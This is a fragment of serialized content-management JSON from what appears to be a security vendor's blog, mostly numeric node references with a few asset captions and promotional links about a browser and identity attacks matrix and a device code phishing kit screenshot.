Type":883},{},[],{"data":21331,"content":21332,"nodeType":879},{},[21333],{"data":21334,"marks":21335,"value":7229,"nodeType":883},{},[],{"data":21337,"content":21338,"nodeType":879},{},[21339],{"data":21340,"marks":21341,"value":7236,"nodeType":883},{},[],{"data":21343,"content":21344,"nodeType":879},{},[21345],{"data":21346,"marks":21347,"value":7244,"nodeType":883},{},[21348],{"type":916},{"data":21350,"content":21351,"nodeType":905},{},[],{"data":21353,"content":21354,"nodeType":909},{},[21355],{"data":21356,"marks":21357,"value":7255,"nodeType":883},{},[21358],{"type":916},{"data":21360,"content":21361,"nodeType":879},{},[21362],{"data":21363,"marks":21364,"value":7262,"nodeType":883},{},[],{"data":21366,"content":21367,"nodeType":879},{},[21368],{"data":21369,"marks":21370,"value":7269,"nodeType":883},{},[],{"data":21372,"content":21373,"nodeType":879},{},[21374],{"data":21375,"marks":21376,"value":7276,"nodeType":883},{},[],{"data":21378,"content":21381,"nodeType":971},{"target":21379},{"sys":21380},{"id":7281,"type":976,"linkType":977},[],{"data":21383,"content":21384,"nodeType":1036},{},[21385],{"data":21386,"marks":21387,"value":7290,"nodeType":883},{},[21388],{"type":916},{"data":21390,"content":21391,"nodeType":879},{},[21392,21395,21401],{"data":21393,"marks":21394,"value":7297,"nodeType":883},{},[],{"data":21396,"content":21397,"nodeType":940},{"uri":7300},[21398],{"data":21399,"marks":21400,"value":7305,"nodeType":883},{},[],{"data":21402,"marks":21403,"value":7309,"nodeType":883},{},[],{"data":21405,"content":21406,"nodeType":879},{},[21407],{"data":21408,"marks":21409,"value":7316,"nodeType":883},{},[],{"data":21411,"content":21412,"nodeType":879},{},[21413],{"data":21414,"marks":21415,"value":7323,"nodeType":883},{},[],{"data":21417,"content":21418,"nodeType":879},{},[21419,21422,21426],{"data":21420,"marks":21421,"value":7330,"nodeType":883},{},[],{"data":21423,"marks":21424,"value":7335,"nodeType":883},{},[21425],{"type":916},{"data":21427,"marks":21428,"value":7339,"nodeType":883},{},[],{"data":21430,"content":21431,"nodeType":1036},{},[21432],{"data":21433,"marks":21434,"value":7347,"nodeType":883},{},[21435],{"type":916},{"data":21437,"content":21438,"nodeType":879},{},[21439,21442,21448,21451,21457],{"data":21440,"marks":21441,"value":7354,"nodeType":883},{},[],{"data":21443,"content":21444,"nodeType":940},{"uri":1144},[21445],{"data":21446,"marks":21447,"value":7361,"nodeType":883},{},[],{"data":21449,"marks":21450,"value":7365,"nodeType":883},{},[],{"data":21452,"content":21453,"nodeType":940},{"uri":1156},[21454],{"data":21455,"marks":21456,"value":7372,"nodeType":883},{},[],{"data":21458,"marks":21459,"value":7376,"nodeType":883},{},[],{"data":21461,"content":21462,"nodeType":879},{},[21463,21466,21470],{"data":21464,"marks":21465,"value":7383,"nodeType":883},{},[],{"data":21467,"marks":21468,"value":7388,"nodeType":883},{},[21469],{"type":916},{"data":21471,"marks":21472,"value":7392,"nodeType":883},{},[],{"data":21474,"content":21475,"nodeType":879},{},[21476],{"data":21477,"marks":21478,"value":7399,"nodeType":883},{},[],{"data":21480,"content":21481,"nodeType":879},{},[21482,21485,21491,21494,21500],{"data":21483,"marks":21484,"value":7406,"nodeType":883},{},[],{"data":21486,"content":21487,"nodeType":940},{"uri":7409},[21488],{"data":21489,"marks":21490,"value":1826,"nodeType":883},{},[],{"data":21492,"marks":21493,"value":7417,"nodeType":883},{},[],{"data":21495,"content":21496,"nodeType":940},{"uri":1331},[21497],{"data":21498,"marks":21499,"value":1321,"nodeType":883},{},[],{"data":21501,"marks":21502,"value":7427,"nodeType":883},{},[],{"data":21504,"content":21505,"nodeType":1036},{},[21506],{"data":21507,"marks":21508,"value":7435,"nodeType":883},{},[21509],{"type":916},{"data":21511,"content":21512,"nodeType":879},{},[21513,21516,21522,21525,21531],{"data":21514,"marks":21515,"value":7442,"nodeType":883},{},[],{"data":21517,"content":21518,"nodeType":940},{"uri":7445},[21519],{"data":21520,"marks":21521,"value":7450,"nodeType":883},{},[],{"data":21523,"marks":21524,"value":7454,"nodeType":883},{},[],{"data":21526,"content":21527,"nodeType":940},{"uri":1343},[21528],{"data":21529,"marks":21530,"value":7461,"nodeType":883},{},[],{"data":21532,"marks":21533,"value":7465,"nodeType":883},{},[],{"data":21535,"content":21536,"nodeType":879},{},[21537],{"data":21538,"marks":21539,"value":7472,"nodeType":883},{},[],{"data":21541,"content":21542,"nodeType":1036},{},[21543],{"data":21544,"marks":21545,"value":7480,"nodeType":883},{},[21546],{"type":916},{"data":21548,"content":21549,"nodeType":879},{},[21550,21553,21559],{"data":21551,"marks":21552,"value":7487,"nodeType":883},{},[],{"data":21554,"content":21555,"nodeType":940},{"uri":2443},[21556],{"data":21557,"marks":21558,"value":7494,"nodeType":883},{},[],{"data":21560,"marks":21561,"value":7498,"nodeType":883},{},[],{"data":21563,"content":21564,"nodeType":879},{},[21565],{"data":21566,"marks":21567,"value":7505,"nodeType":883},{},[],{"data":21569,"content":21570,"nodeType":879},{},[21571],{"data":21572,"marks":21573,"value":7512,"nodeType":883},{},[],{"data":21575,"content":21578,"nodeType":971},{"target":21576},{"sys":21577},{"id":7517,"type":976,"linkType":977},[],{"data":21580,"content":21581,"nodeType":879},{},[21582],{"data":21583,"marks":21584,"value":7525,"nodeType":883},{},[],{"data":21586,"content":21587,"nodeType":1036},{},[21588],{"data":21589,"marks":21590,"value":7533,"nodeType":883},{},[21591],{"type":916},{"data":21593,"content":21594,"nodeType":879},{},[21595,21598,21604],{"data":21596,"marks":21597,"value":7540,"nodeType":883},{},[],{"data":21599,"content":21600,"nodeType":940},{"uri":1440},[21601],{"data":21602,"marks":21603,"value":7547,"nodeType":883},{},[],{"data":21605,"marks":21606,"value":7551,"nodeType":883},{},[],{"data":21608,"content":21609,"nodeType":879},{},[21610],{"data":21611,"marks":21612,"value":7558,"nodeType":883},{},[],{"data":21614,"content":21615,"nodeType":879},{},[21616,21619,21626],{"data":21617,"marks":21618,"value":7565,"nodeType":883},{},[],{"data":21620,"content":21621,"nodeType":940},{"uri":1440},[21622],{"data":21623,"marks":21624,"value":7573,"nodeType":883},{},[21625],{"type":948},{"data":21627,"marks":21628,"value":7577,"nodeType":883},{},[],{"data":21630,"content":21631,"nodeType":879},{},[21632],{"data":21633,"marks":21634,"value":7584,"nodeType":883},{},[],{"data":21636,"content":21637,"nodeType":905},{},[],{"data":21639,"content":21640,"nodeType":909},{},[21641],{"data":21642,"marks":21643,"value":7595,"nodeType":883},{},[21644],{"type":916},{"data":21646,"content":21647,"nodeType":879},{},[21648],{"data":21649,"marks":21650,"value":7602,"nodeType":883},{},[],{"data":21652,"content":21653,"nodeType":1531},{},[21654,21672,21690,21708],{"data":21655,"content":21656,"nodeType":1535},{},[21657],{"data":21658,"content":21659,"nodeType":879},{},[21660,21663,21669],{"data":21661,"marks":21662,"value":7615,"nodeType":883},{},[],{"data":21664,"content":21665,"nodeType":940},{"uri":7618},[21666],{"data":21667,"marks":21668,"value":2006,"nodeType":883},{},[],{"data":21670,"marks":21671,"value":7626,"nodeType":883},{},[],{"data":21673,"content":21674,"nodeType":1535},{},[21675],{"data":21676,"content":21677,"nodeType":879},{},[21678,21681,21687],{"data":21679,"marks":21680,"value":7636,"nodeType":883},{},[],{"data":21682,"content":21683,"nodeType":940},{"uri":7639},[21684],{"data":21685,"marks":21686,"value":7644,"nodeType":883},{},[],{"data":21688,"marks":21689,"value":7648,"nodeType":883},{},[],{"data":21691,"content":21692,"nodeType":1535},{},[21693],{"data":21694,"content":21695,"nodeType":879},{},[21696,21699,21705],{"data":21697,"marks":21698,"value":7615,"nodeType":883},{},[],{"data":21700,"content":21701,"nodeType":940},{"uri":1331},[21702],{"data":21703,"marks":21704,"value":7664,"nodeType":883},{},[],{"data":21706,"marks":21707,"value":7668,"nodeType":883},{},[],{"data":21709,"content":21710,"nodeType":1535},{},[21711],{"data":21712,"content":21713,"nodeType":879},{},[21714,21717,21723],{"data":21715,"marks":21716,"value":3786,"nodeType":883},{},[],{"data":21718,"content":21719,"nodeType":940},{"uri":7680},[21720],{"data":21721,"marks":21722,"value":7685,"nodeType":883},{},[],{"data":21724,"marks":21725,"value":7689,"nodeType":883},{},[],{"data":21727,"content":21728,"nodeType":879},{},[21729],{"data":21730,"marks":21731,"value":7696,"nodeType":883},{},[],{"data":21733,"content":21734,"nodeType":879},{},[21735,21738,21742],{"data":21736,"marks":21737,"value":7703,"nodeType":883},{},[],{"data":21739,"marks":21740,"value":7708,"nodeType":883},{},[21741],{"type":916},{"data":21743,"marks":21744,"value":7712,"nodeType":883},{},[],{"data":21746,"content":21747,"nodeType":905},{},[],{"data":21749,"content":21750,"nodeType":909},{},[21751,21755,21760,21764,21769],{"data":21752,"marks":21753,"value":7723,"nodeType":883},{},[21754],{"type":916},{"data":21756,"marks":21757,"value":7729,"nodeType":883},{},[21758,21759],{"type":891},{"type":916},{"data":21761,"marks":21762,"value":7734,"nodeType":883},{},[21763],{"type":916},{"data":21765,"marks":21766,"value":7740,"nodeType":883},{},[21767,21768],{"type":891},{"type":916},{"data":21770,"marks":21771,"value":7745,"nodeType":883},{},[21772],{"type":916},{"data":21774,"content":21775,"nodeType":879},{},[21776,21779,21785],{"data":21777,"marks":21778,"value":7752,"nodeType":883},{},[],{"data":21780,"content":21781,"nodeType":940},{"uri":7755},[21782],{"data":21783,"marks":21784,"value":7760,"nodeType":883},{},[],{"data":21786,"marks":21787,"value":7764,"nodeType":883},{},[],{"data":21789,"content":21790,"nodeType":879},{},[21791],{"data":21792,"marks":21793,"value":7771,"nodeType":883},{},[],{"data":21795,"content":21796,"nodeType":879},{},[21797],{"data":21798,"marks":21799,"value":7778,"nodeType":883},{},[],{"data":21801,"content":21802,"nodeType":905},{},[],{"data":21804,"content":21805,"nodeType":909},{},[21806],{"data":21807,"marks":21808,"value":7789,"nodeType":883},{},[21809],{"type":916},{"data":21811,"content":21812,"nodeType":879},{},[21813,21816,21822],{"data":21814,"marks":21815,"value":7796,"nodeType":883},{},[],{"data":21817,"content":21818,"nodeType":940},{"uri":7799},[21819],{"data":21820,"marks":21821,"value":7804,"nodeType":883},{},[],{"data":21823,"marks":21824,"value":7808,"nodeType":883},{},[],{"data":21826,"content":21827,"nodeType":879},{},[21828],{"data":21829,"marks":21830,"value":7815,"nodeType":883},{},[],{"data":21832,"content":21833,"nodeType":879},{},[21834],{"data":21835,"marks":21836,"value":7822,"nodeType":883},{},[],{"data":21838,"content":21839,"nodeType":879},{},[21840,21843,21849],{"data":21841,"marks":21842,"value":7829,"nodeType":883},{},[],{"data":21844,"content":21845,"nodeType":940},{"uri":7832},[21846],{"data":21847,"marks":21848,"value":7804,"nodeType":883},{},[],{"data":21850,"marks":21851,"value":1350,"nodeType":883},{},[],{"data":21853,"content":21854,"nodeType":905},{},[],{"data":21856,"content":21857,"nodeType":909},{},[21858],{"data":21859,"marks":21860,"value":7850,"nodeType":883},{},[21861],{"type":916},{"data":21863,"content":21864,"nodeType":879},{},[21865],{"data":21866,"marks":21867,"value":7857,"nodeType":883},{},[],{"data":21869,"content":21870,"nodeType":1531},{},[21871,21880,21889],{"data":21872,"content":21873,"nodeType":1535},{},[21874],{"data":21875,"content":21876,"nodeType":879},{},[21877],{"data":21878,"marks":21879,"value":7870,"nodeType":883},{},[],{"data":21881,"content":21882,"nodeType":1535},{},[21883],{"data":21884,"content":21885,"nodeType":879},{},[21886],{"data":21887,"marks":21888,"value":7880,"nodeType":883},{},[],{"data":21890,"content":21891,"nodeType":1535},{},[21892],{"data":21893,"content":21894,"nodeType":879},{},[21895],{"data":21896,"marks":21897,"value":7890,"nodeType":883},{},[],{"data":21899,"content":21900,"nodeType":879},{},[21901],{"data":21902,"marks":21903,"value":7897,"nodeType":883},{},[],{"data":21905,"content":21906,"nodeType":879},{},[21907,21910,21916],{"data":21908,"marks":21909,"value":7904,"nodeType":883},{},[],{"data":21911,"content":21912,"nodeType":940},{"uri":7182},[21913],{"data":21914,"marks":21915,"value":7911,"nodeType":883},{},[],{"data":21917,"marks":21918,"value":1350,"nodeType":883},{},[],{"data":21920,"content":21921,"nodeType":879},{},[21922,21925,21931],{"data":21923,"marks":21924,"value":7921,"nodeType":883},{},[],{"data":21926,"content":21927,"nodeType":940},{"uri":7924},[21928],{"data":21929,"marks":21930,"value":7929,"nodeType":883},{},[],{"data":21932,"marks":21933,"value":7933,"nodeType":883},{},[],{"data":21935,"content":21938,"nodeType":971},{"target":21936},{"sys":21937},{"id":7938,"type":976,"linkType":977},[],{"data":21940,"content":21941,"nodeType":905},{},[],{"data":21943,"content":21944,"nodeType":879},{},[21945],{"data":21946,"marks":21947,"value":7949,"nodeType":883},{},[],{"data":21949,"content":21950,"nodeType":879},{},[21951,21954,21960],{"data":21952,"marks":21953,"value":6671,"nodeType":883},{},[],{"data":21955,"content":21956,"nodeType":940},{"uri":4772},[21957],{"data":21958,"marks":21959,"value":6679,"nodeType":883},{},[],{"data":21961,"marks":21962,"value":6683,"nodeType":883},{},[],{"entries":21964},{"hyperlink":21965,"inline":21966,"block":21967},[],[],[21968,21972,21976,21984],{"sys":21969,"__typename":1765,"title":21970,"caption":59,"layoutMode":59,"file":21971},{"id":7196},"Browser & Identity Attacks Matrix Screenshot",{"url":19075,"width":19076,"height":19077},{"sys":21973,"__typename":13297,"type":13298,"ctaText":21974,"buttonLabel":21975,"buttonColour":13301,"buttonUrl":7924},{"id":7281},"Get our latest technical whitepaper to learn about the state of browser-based attacks in 2026 (no sign-up required).","Download Now",{"sys":21977,"__typename":1765,"title":21978,"caption":21979,"layoutMode":59,"file":21980},{"id":7517},"Device code phishing kit example","Device code phishing kit example.",{"url":21981,"width":21982,"height":21983},"https:\u002F\u002Fimages.ctfassets.net\u002Fy1cdw1ablpvd\u002F2zbjCCqXRMTvaOr6Xpx2BJ\u002Fccb3000b043b3bbc11a6d2315e66f6f1\u002FCopy_of_Device_code_login_completion.gif",1280,720,{"sys":21985,"__typename":13297,"type":13298,"ctaText":21986,"buttonLabel":21987,"buttonColour":13301,"buttonUrl":7182},{"id":7938},"Check out the new-look Browser & Identity Attacks Matrix","See it Here",{"items":21989},[],{},"Stop browser attacks with our MITRE-inspired matrix",{"items":21993},[21994,22827,24546],{"__typename":1967,"sys":21995,"content":21996,"title":17995,"synopsis":17996,"hashTags":59,"publishedDate":7967,"slug":17997,"tagsCollection":22817,"authorsCollection":22823},{"id":17035},{"json":21997},{"data":21998,"content":21999,"nodeType":875},{},[22000,22022,22046,22079,22112,22117,22127,22130,22137,22179,22185,22204,22209,22212,22219,22243,22249,22256,22261,22264,22271,22277,22292,22298,22331,22337,22340,22347,22362,22404,22407,22414,22429,22444,22451,22457,22467,22477,22487,22497,22512,22519,22525,22528,22534,22540,22555,22558,22565,22580,22811],{"data":22001,"content":22002,"nodeType":879},{},[22003,22006,22012,22015,22019],{"data":22004,"marks":22005,"value":17046,"nodeType":883},{},[],{"data":22007,"content":22008,"nodeType":940},{"uri":7618},[22009],{"data":22010,"marks":22011,"value":2006,"nodeType":883},{},[],{"data":22013,"marks":22014,"value":17056,"nodeType":883},{},[],{"data":22016,"marks":22017,"value":17061,"nodeType":883},{},[22018],{"type":916},{"data":22020,"marks":22021,"value":17065,"nodeType":883},{},[],{"data":22023,"content":22024,"nodeType":879},{},[22025,22028,22034,22037,22043],{"data":22026,"marks":22027,"value":17072,"nodeType":883},{},[],{"data":22029,"content":22030,"nodeType":940},{"uri":17075},[22031],{"data":22032,"marks":22033,"value":17080,"nodeType":883},{},[],{"data":22035,"marks":22036,"value":17084,"nodeType":883},{},[],{"data":22038,"content":22039,"nodeType":940},{"uri":17087},[22040],{"data":22041,"marks":22042,"value":17092,"nodeType":883},{},[],{"data":22044,"marks":22045,"value":17096,"nodeType":883},{},[],{"data":22047,"content":22048,"nodeType":879},{},[22049,22052,22058,22061,22067,22070,22076],{"data":22050,"marks":22051,"value":17103,"nodeType":883},{},[],{"data":22053,"content":22054,"nodeType":940},{"uri":17106},[22055],{"data":22056,"marks":22057,"value":17111,"nodeType":883},{},[],{"data":22059,"marks":22060,"value":17115,"nodeType":883},{},[],{"data":22062,"content":22063,"nodeType":940},{"uri":17118},[22064],{"data":22065,"marks":22066,"value":17123,"nodeType":883},{},[],{"data":22068,"marks":22069,"value":17127,"nodeType":883},{},[],{"data":22071,"content":22072,"nodeType":940},{"uri":17130},[22073],{"data":22074,"marks":22075,"value":17135,"nodeType":883},{},[],{"data":22077,"marks":22078,"value":17139,"nodeType":883},{},[],{"data":22080,"content":22081,"nodeType":879},{},[22082,22085,22091,22094,22100,22103,22109],{"data":22083,"marks":22084,"value":17146,"nodeType":883},{},[],{"data":22086,"content":22087,"nodeType":940},{"uri":17149},[22088],{"data":22089,"marks":22090,"value":17154,"nodeType":883},{},[],{"data":22092,"marks":22093,"value":17158,"nodeType":883},{},[],{"data":22095,"content":22096,"nodeType":940},{"uri":17161},[22097],{"data":22098,"marks":22099,"value":17166,"nodeType":883},{},[],{"data":22101,"marks":22102,"value":17170,"nodeType":883},{},[],{"data":22104,"content":22105,"nodeType":940},{"uri":17173},[22106],{"data":22107,"marks":22108,"value":17178,"nodeType":883},{},[],{"data":22110,"marks":22111,"value":17182,"nodeType":883},{},[],{"data":22113,"content":22116,"nodeType":971},{"target":22114},{"sys":22115},{"id":17187,"type":976,"linkType":977},[],{"data":22118,"content":22119,"nodeType":879},{},[22120,22124],{"data":22121,"marks":22122,"value":17196,"nodeType":883},{},[22123],{"type":916},{"data":22125,"marks":22126,"value":17200,"nodeType":883},{},[],{"data":22128,"content":22129,"nodeType":905},{},[],{"data":22131,"content":22132,"nodeType":909},{},[22133],{"data":22134,"marks":22135,"value":17211,"nodeType":883},{},[22136],{"type":916},{"data":22138,"content":22139,"nodeType":879},{},[22140,22143,22149,22152,22158,22161,22167,22170,22176],{"data":22141,"marks":22142,"value":17218,"nodeType":883},{},[],{"data":22144,"content":22145,"nodeType":940},{"uri":2100},[22146],{"data":22147,"marks":22148,"value":17225,"nodeType":883},{},[],{"data":22150,"marks":22151,"value":12833,"nodeType":883},{},[],{"data":22153,"content":22154,"nodeType":940},{"uri":17231},[22155],{"data":22156,"marks":22157,"value":17236,"nodeType":883},{},[],{"data":22159,"marks":22160,"value":13249,"nodeType":883},{},[],{"data":22162,"content":22163,"nodeType":940},{"uri":17118},[22164],{"data":22165,"marks":22166,"value":17246,"nodeType":883},{},[],{"data":22168,"marks":22169,"value":17250,"nodeType":883},{},[],{"data":22171,"content":22172,"nodeType":940},{"uri":2755},[22173],{"data":22174,"marks":22175,"value":17257,"nodeType":883},{},[],{"data":22177,"marks":22178,"value":1350,"nodeType":883},{},[],{"data":22180,"content":22181,"nodeType":879},{},[22182],{"data":22183,"marks":22184,"value":17267,"nodeType":883},{},[],{"data":22186,"content":22187,"nodeType":879},{},[22188,22191,22197,22200],{"data":22189,"marks":22190,"value":17274,"nodeType":883},{},[],{"data":22192,"content":22193,"nodeType":940},{"uri":2755},[22194],{"data":22195,"marks":22196,"value":17281,"nodeType":883},{},[],{"data":22198,"marks":22199,"value":17285,"nodeType":883},{},[],{"data":22201,"marks":22202,"value":17290,"nodeType":883},{},[22203],{"type":916},{"data":22205,"content":22208,"nodeType":971},{"target":22206},{"sys":22207},{"id":17295,"type":976,"linkType":977},[],{"data":22210,"content":22211,"nodeType":905},{},[],{"data":22213,"content":22214,"nodeType":909},{},[22215],{"data":22216,"marks":22217,"value":17307,"nodeType":883},{},[22218],{"type":916},{"data":22220,"content":22221,"nodeType":879},{},[22222,22225,22231,22234,22240],{"data":22223,"marks":22224,"value":3786,"nodeType":883},{},[],{"data":22226,"content":22227,"nodeType":940},{"uri":7639},[22228],{"data":22229,"marks":22230,"value":17320,"nodeType":883},{},[],{"data":22232,"marks":22233,"value":17324,"nodeType":883},{},[],{"data":22235,"content":22236,"nodeType":940},{"uri":17130},[22237],{"data":22238,"marks":22239,"value":17331,"nodeType":883},{},[],{"data":22241,"marks":22242,"value":17335,"nodeType":883},{},[],{"data":22244,"content":22245,"nodeType":879},{},[22246],{"data":22247,"marks":22248,"value":17342,"nodeType":883},{},[],{"data":22250,"content":22251,"nodeType":879},{},[22252],{"data":22253,"marks":22254,"value":17350,"nodeType":883},{},[22255],{"type":916},{"data":22257,"content":22260,"nodeType":971},{"target":22258},{"sys":22259},{"id":17355,"type":976,"linkType":977},[],{"data":22262,"content":22263,"nodeType":905},{},[],{"data":22265,"content":22266,"nodeType":909},{},[22267],{"data":22268,"marks":22269,"value":17367,"nodeType":883},{},[22270],{"type":916},{"data":22272,"content":22273,"nodeType":879},{},[22274],{"data":22275,"marks":22276,"value":17374,"nodeType":883},{},[],{"data":22278,"content":22279,"nodeType":879},{},[22280,22283,22289],{"data":22281,"marks":22282,"value":3786,"nodeType":883},{},[],{"data":22284,"content":22285,"nodeType":940},{"uri":2202},[22286],{"data":22287,"marks":22288,"value":2871,"nodeType":883},{},[],{"data":22290,"marks":22291,"value":17390,"nodeType":883},{},[],{"data":22293,"content":22294,"nodeType":879},{},[22295],{"data":22296,"marks":22297,"value":17397,"nodeType":883},{},[],{"data":22299,"content":22300,"nodeType":879},{},[22301,22304,22310,22313,22319,22322,22328],{"data":22302,"marks":22303,"value":17404,"nodeType":883},{},[],{"data":22305,"content":22306,"nodeType":940},{"uri":2885},[22307],{"data":22308,"marks":22309,"value":17411,"nodeType":883},{},[],{"data":22311,"marks":22312,"value":17415,"nodeType":883},{},[],{"data":22314,"content":22315,"nodeType":940},{"uri":17418},[22316],{"data":22317,"marks":22318,"value":17423,"nodeType":883},{},[],{"data":22320,"marks":22321,"value":17427,"nodeType":883},{},[],{"data":22323,"content":22324,"nodeType":940},{"uri":2897},[22325],{"data":22326,"marks":22327,"value":17434,"nodeType":883},{},[],{"data":22329,"marks":22330,"value":17438,"nodeType":883},{},[],{"data":22332,"content":22333,"nodeType":879},{},[22334],{"data":22335,"marks":22336,"value":17445,"nodeType":883},{},[],{"data":22338,"content":22339,"nodeType":905},{},[],{"data":22341,"content":22342,"nodeType":909},{},[22343],{"data":22344,"marks":22345,"value":17456,"nodeType":883},{},[22346],{"type":916},{"data":22348,"content":22349,"nodeType":879},{},[22350,22353,22359],{"data":22351,"marks":22352,"value":17463,"nodeType":883},{},[],{"data":22354,"content":22355,"nodeType":940},{"uri":17466},[22356],{"data":22357,"marks":22358,"value":17471,"nodeType":883},{},[],{"data":22360,"marks":22361,"value":17475,"nodeType":883},{},[],{"data":22363,"content":22364,"nodeType":879},{},[22365,22368,22374,22377,22383,22386,22392,22395,22401],{"data":22366,"marks":22367,"value":17482,"nodeType":883},{},[],{"data":22369,"content":22370,"nodeType":940},{"uri":17485},[22371],{"data":22372,"marks":22373,"value":17490,"nodeType":883},{},[],{"data":22375,"marks":22376,"value":17494,"nodeType":883},{},[],{"data":22378,"content":22379,"nodeType":940},{"uri":17497},[22380],{"data":22381,"marks":22382,"value":17502,"nodeType":883},{},[],{"data":22384,"marks":22385,"value":17506,"nodeType":883},{},[],{"data":22387,"content":22388,"nodeType":940},{"uri":17509},[22389],{"data":22390,"marks":22391,"value":17514,"nodeType":883},{},[],{"data":22393,"marks":22394,"value":17518,"nodeType":883},{},[],{"data":22396,"content":22397,"nodeType":940},{"uri":17521},[22398],{"data":22399,"marks":22400,"value":17526,"nodeType":883},{},[],{"data":22402,"marks":22403,"value":17530,"nodeType":883},{},[],{"data":22405,"content":22406,"nodeType":905},{},[],{"data":22408,"content":22409,"nodeType":909},{},[22410],{"data":22411,"marks":22412,"value":17541,"nodeType":883},{},[22413],{"type":916},{"data":22415,"content":22416,"nodeType":879},{},[22417,22420,22426],{"data":22418,"marks":22419,"value":17548,"nodeType":883},{},[],{"data":22421,"content":22422,"nodeType":940},{"uri":2443},[22423],{"data":22424,"marks":22425,"value":17555,"nodeType":883},{},[],{"data":22427,"marks":22428,"value":17559,"nodeType":883},{},[],{"data":22430,"content":22431,"nodeType":879},{},[22432,22435,22441],{"data":22433,"marks":22434,"value":17566,"nodeType":883},{},[],{"data":22436,"content":22437,"nodeType":940},{"uri":17569},[22438],{"data":22439,"marks":22440,"value":316,"nodeType":883},{},[],{"data":22442,"marks":22443,"value":17577,"nodeType":883},{},[],{"data":22445,"content":22446,"nodeType":1036},{},[22447],{"data":22448,"marks":22449,"value":17585,"nodeType":883},{},[22450],{"type":916},{"data":22452,"content":22453,"nodeType":879},{},[22454],{"data":22455,"marks":22456,"value":17592,"nodeType":883},{},[],{"data":22458,"content":22459,"nodeType":879},{},[22460,22464],{"data":22461,"marks":22462,"value":17600,"nodeType":883},{},[22463],{"type":916},{"data":22465,"marks":22466,"value":17604,"nodeType":883},{},[],{"data":22468,"content":22469,"nodeType":879},{},[22470,22474],{"data":22471,"marks":22472,"value":17612,"nodeType":883},{},[22473],{"type":916},{"data":22475,"marks":22476,"value":17616,"nodeType":883},{},[],{"data":22478,"content":22479,"nodeType":879},{},[22480,22484],{"data":22481,"marks":22482,"value":17624,"nodeType":883},{},[22483],{"type":916},{"data":22485,"marks":22486,"value":17628,"nodeType":883},{},[],{"data":22488,"content":22489,"nodeType":879},{},[22490,22494],{"data":22491,"marks":22492,"value":17636,"nodeType":883},{},[22493],{"type":916},{"data":22495,"marks":22496,"value":17640,"nodeType":883},{},[],{"data":22498,"content":22499,"nodeType":879},{},[22500,22503,22509],{"data":22501,"marks":22502,"value":21,"nodeType":883},{},[],{"data":22504,"content":22505,"nodeType":940},{"uri":12877},[22506],{"data":22507,"marks":22508,"value":17653,"nodeType":883},{},[],{"data":22510,"marks":22511,"value":21,"nodeType":883},{},[],{"data":22513,"content":22514,"nodeType":1036},{},[22515],{"data":22516,"marks":22517,"value":17664,"nodeType":883},{},[22518],{"type":916},{"data":22520,"content":22521,"nodeType":879},{},[22522],{"data":22523,"marks":22524,"value":17671,"nodeType":883},{},[],{"data":22526,"content":22527,"nodeType":905},{},[],{"data":22529,"content":22530,"nodeType":879},{},[22531],{"data":22532,"marks":22533,"value":17681,"nodeType":883},{},[],{"data":22535,"content":22536,"nodeType":879},{},[22537],{"data":22538,"marks":22539,"value":1736,"nodeType":883},{},[],{"data":22541,"content":22542,"nodeType":879},{},[22543,22546,22552],{"data":22544,"marks":22545,"value":21,"nodeType":883},{},[],{"data":22547,"content":22548,"nodeType":940},{"uri":3254},[22549],{"data":22550,"marks":22551,"value":3260,"nodeType":883},{},[],{"data":22553,"marks":22554,"value":21,"nodeType":883},{},[],{"data":22556,"content":22557,"nodeType":905},{},[],{"data":22559,"content":22560,"nodeType":909},{},[22561],{"data":22562,"marks":22563,"value":17713,"nodeType":883},{},[22564],{"type":916},{"data":22566,"content":22567,"nodeType":879},{},[22568,22571,22577],{"data":22569,"marks":22570,"value":17720,"nodeType":883},{},[],{"data":22572,"content":22573,"nodeType":940},{"uri":7618},[22574],{"data":22575,"marks":22576,"value":17727,"nodeType":883},{},[],{"data":22578,"marks":22579,"value":17731,"nodeType":883},{},[],{"data":22581,"content":22582,"nodeType":8845},{},[22583,22626,22682,22725,22768],{"data":22584,"content":22585,"nodeType":8752},{},[22586,22596,22606,22616],{"data":22587,"content":22588,"nodeType":8766},{},[22589],{"data":22590,"content":22591,"nodeType":879},{},[22592],{"data":22593,"marks":22594,"value":17748,"nodeType":883},{},[22595],{"type":916},{"data":22597,"content":22598,"nodeType":8766},{},[22599],{"data":22600,"content":22601,"nodeType":879},{},[22602],{"data":22603,"marks":22604,"value":17759,"nodeType":883},{},[22605],{"type":916},{"data":22607,"content":22608,"nodeType":8766},{},[22609],{"data":22610,"content":22611,"nodeType":879},{},[22612],{"data":22613,"marks":22614,"value":17770,"nodeType":883},{},[22615],{"type":916},{"data":22617,"content":22618,"nodeType":8766},{},[22619],{"data":22620,"content":22621,"nodeType":879},{},[22622],{"data":22623,"marks":22624,"value":17781,"nodeType":883},{},[22625],{"type":916},{"data":22627,"content":22628,"nodeType":8752},{},[22629,22649,22658,22667],{"data":22630,"content":22631,"nodeType":8766},{},[22632],{"data":22633,"content":22634,"nodeType":879},{},[22635,22639,22642,22646],{"data":22636,"marks":22637,"value":17795,"nodeType":883},{},[22638],{"type":916},{"data":22640,"marks":22641,"value":17799,"nodeType":883},{},[],{"data":22643,"marks":22644,"value":17804,"nodeType":883},{},[22645],{"type":916},{"data":22647,"marks":22648,"value":17808,"nodeType":883},{},[],{"data":22650,"content":22651,"nodeType":8766},{},[22652],{"data":22653,"content":22654,"nodeType":879},{},[22655],{"data":22656,"marks":22657,"value":17818,"nodeType":883},{},[],{"data":22659,"content":22660,"nodeType":8766},{},[22661],{"data":22662,"content":22663,"nodeType":879},{},[22664],{"data":22665,"marks":22666,"value":17828,"nodeType":883},{},[],{"data":22668,"content":22669,"nodeType":8766},{},[22670,22676],{"data":22671,"content":22672,"nodeType":879},{},[22673],{"data":22674,"marks":22675,"value":17838,"nodeType":883},{},[],{"data":22677,"content":22678,"nodeType":879},{},[22679],{"data":22680,"marks":22681,"value":17845,"nodeType":883},{},[],{"data":22683,"content":22684,"nodeType":8752},{},[22685,22698,22707,22716],{"data":22686,"content":22687,"nodeType":8766},{},[22688],{"data":22689,"content":22690,"nodeType":879},{},[22691,22695],{"data":22692,"marks":22693,"value":17859,"nodeType":883},{},[22694],{"type":916},{"data":22696,"marks":22697,"value":17863,"nodeType":883},{},[],{"data":22699,"content":22700,"nodeType":8766},{},[22701],{"data":22702,"content":22703,"nodeType":879},{},[22704],{"data":22705,"marks":22706,"value":17873,"nodeType":883},{},[],{"data":22708,"content":22709,"nodeType":8766},{},[22710],{"data":22711,"content":22712,"nodeType":879},{},[22713],{"data":22714,"marks":22715,"value":17883,"nodeType":883},{},[],{"data":22717,"content":22718,"nodeType":8766},{},[22719],{"data":22720,"content":22721,"nodeType":879},{},[